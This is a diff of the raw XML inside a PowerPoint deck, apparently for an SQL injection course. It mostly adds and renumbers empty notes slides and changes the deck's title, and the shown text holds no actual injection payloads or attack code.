-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B663E6-E656-660B-6988-A6EBAEC02316}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922D83DA-FB1B-9827-9253-8F7E2FECC5B0}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098185214"/>
-      </p:ext>
-    </p:extLst>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide29.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 166"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
   </p:cSld>
   <p:clrMapOvr>
     <a:masterClrMapping/>
@@ -3599,7 +3672,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide30.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3607,7 +3680,7 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7329671A-2D30-40A6-A837-B67BEFF4F726}"/>
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2987C4B5-9791-F752-496A-FC6655DF675A}"/>
             </a:ext>
           </a:extLst>
         </p:cNvPr>
@@ -3627,7 +3700,7 @@
           <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1F85BE6-69A4-B15D-1003-CDC063911B38}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8B663E6-E656-660B-6988-A6EBAEC02316}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3674,7 +3747,7 @@
           <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
             <a:extLst>
               <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{741A508A-7920-4471-0A5E-531A095E574E}"/>
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{922D83DA-FB1B-9827-9253-8F7E2FECC5B0}"/>
               </a:ext>
             </a:extLst>
           </p:cNvPr>
@@ -3716,7 +3789,7 @@
     </p:spTree>
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4216698038"/>
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2098185214"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3726,7 +3799,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide5.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA4F100C-6502-1DA7-F527-EE4879D6A161}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A052EDC-7CCC-17E7-A4C4-DE1D157C03AD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C940599D-779D-0574-000F-416EFD584DEA}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2389692833"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3830,7 +4030,215 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide6.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 166"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="167" name="Google Shape;167;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="168" name="Google Shape;168;g6d4d7e4f0f_5_122:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide5.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3957,7 +4365,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide7.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide6.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4084,7 +4492,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide8.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide7.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4211,7 +4619,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide9.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide8.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4329,6 +4737,133 @@
     <p:extLst>
       <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
         <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="240431576"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF65E9D9-515A-0369-9C94-654A50326B61}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5D71BE5-A3C5-C1EB-513E-144BDC4EF66E}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{477FEC5D-261E-D38E-1EAC-26A9E63E1BBD}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2223054850"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -11743,7 +12278,7 @@
             </a:pPr>
             <a:r>
               <a:rPr lang="en" dirty="0"/>
-              <a:t>SQL Injection crash(ed) course</a:t>
+              <a:t>SQL Injection crash(ed) course – Try this ONLY at home!</a:t>
             </a:r>
             <a:endParaRPr dirty="0"/>
           </a:p>
@@ -11867,6 +12402,364 @@
 </file>
 
 <file path=ppt/slides/slide10.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 127">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D62413F-EA1C-54C4-E025-71445E9639E4}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="128" name="Google Shape;128;p31">
+            <a:extLst>
